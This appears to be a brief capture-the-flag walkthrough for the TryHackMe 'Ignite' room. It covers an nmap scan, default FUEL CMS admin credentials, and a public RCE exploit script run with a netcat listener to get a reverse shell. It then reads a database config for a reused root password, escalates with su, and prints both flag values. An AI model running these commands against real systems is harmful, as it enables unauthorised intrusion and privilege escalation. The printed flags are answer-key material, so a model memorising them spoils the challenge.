Room Link : https://tryhackme.com/r/room/ignite
STEP1
nmap -p- -Pn -A -T4 -sSV 10.10.178.241
FINDING
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/fuel/
|_http-title: Welcome to FUEL CMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
--------------------------------------------------------------------------------------------------------
STEP2
http://10.10.178.241/
FINDING
To access the FUEL admin, go to:
http://10.10.178.241/fuel
User name: admin
Password: admin (you can and should change this password and admin user information after logging in)
---------------------------------------------------------------------------------------------------------
STEP3
use exploit
https://github.com/ice-wzl/Fuel-1.4.1-RCE-Updated
python3 /root/Desktop/Fuel-Updated.py http://10.10.178.241 10.17.65.196 4422
and get a revers shell on another terminal nc -nvlp 4422
FINDING
cd /
ls -la
cat flag.txt
6470e394cbf6dab6a91682cc8585059b
---------------------------------------------------------------------------------------------------------
STEP4
http://10.10.237.130/
FINDING
change the database configuration found in fuel/application/config/database.php
---------------------------------------------------------------------------------------------------------
STEP5
cd /var/www/html/fuel/application/config
ls -la
cat database.php
FINDING
dsn = ,
hostname = localhost,
username = root,
password = mememe,
database = fuel_schema,
dbdriver = mysqli,
dbprefix = ,
---------------------------------------------------------------------------------------------------------
STEP6
su root -- with password mememe
whoami
root
cd /root
cat root.txt
b9bbcb33e11b80be759c4e844862482d
---------------------------------------------------------------------------------------------------------
|